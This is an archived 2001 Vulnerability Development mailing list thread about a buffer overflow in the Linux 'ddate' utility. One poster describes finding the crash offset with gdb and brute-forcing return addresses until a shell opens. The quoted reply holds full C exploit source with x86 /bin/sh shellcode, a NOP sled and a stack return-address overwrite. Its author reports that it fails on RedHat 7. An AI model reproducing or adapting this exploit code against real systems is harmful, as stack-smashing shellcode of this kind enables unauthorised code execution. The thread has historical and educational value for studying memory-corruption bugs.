Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: ddate buffer overflow

From: "enthh () FLASH NET" <enthh () FLASH NET>
Date: Sun, 11 Feb 2001 14:19:50 -0500
I wrote the exploit for my slackware 7.0.0 , im not even sure which version
of ddate it is.  I tried adding A's from 300 until i got a segmentation
fault (at 410), and then I ran gdb.
# gdb -c core /usr/bin/ddate
(gdb) info r esp
This gave me the esp, and from there I wrote the shellcode/outline for the
exploit and brute forced the esp will offsets -4000 to 4000, incrementing by
1, thus dropping me into a /bin/bash shell.  I then took the ret address
from the working offset and made that the default.

I haven't tried it on any box other than this Slackware 7.0.0, so Im sorry
that I cant give you the specifics for your RedHat exploit.. Try doing it
the long way...

----- Original Message -----
From: "s1gnal_9 " <s1gnal_9 () sunos com>
To: <enthh () FLASH NET>
Sent: 10 February, 2001 9:35 PM
Subject: Re: ddate buffer overflow



Hi, I started to write a exploit for it minutes after it was posted too,

just for fun, knowing that it wasn't suid, I was wondering what distro you
are running.  I started to write one on a friends RH7 box, for me, I didnt
get eip and ebp of 0x41414141 until I sent 447 A's after the +.  So from
their on i started to make it work, but it isn't executing on the stack...
I've looked over it a bit, and I don't see what I did wrong...


Heres my little version... If you see my problem, I'd really appreciate a

reply... Thanks a lot.


/* I added 8 bytes to buf[] for the 8bytes that eip and esp take up */

#include <stdio.h>
#include <string.h>

#define OFFSETS 0

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc,char **argv)
{
  char buf[455];
  char buf2[456];
  int offset;

  if(argc < 2) { offset = OFFSETS; } else { offset = atoi(argv[1]); }
  memset(buf,0x90,sizeof(buf));
  memcpy(buf + sizeof(buf) - strlen(shellcode) - 8, shellcode,
  strlen(shellcode));
  *(long *)&buf[455 - 4] = get_sp() - offset;
  strcpy(buf2, "+");
  strcat(buf2, buf);
  execl("/usr/bin/ddate", "ddate", buf2, NULL);
}
--
_______________________________________________
Get your free email from http://sunos.com
Powered by Instant Portal
Previous By Date Next
Previous By Thread Next

Current thread: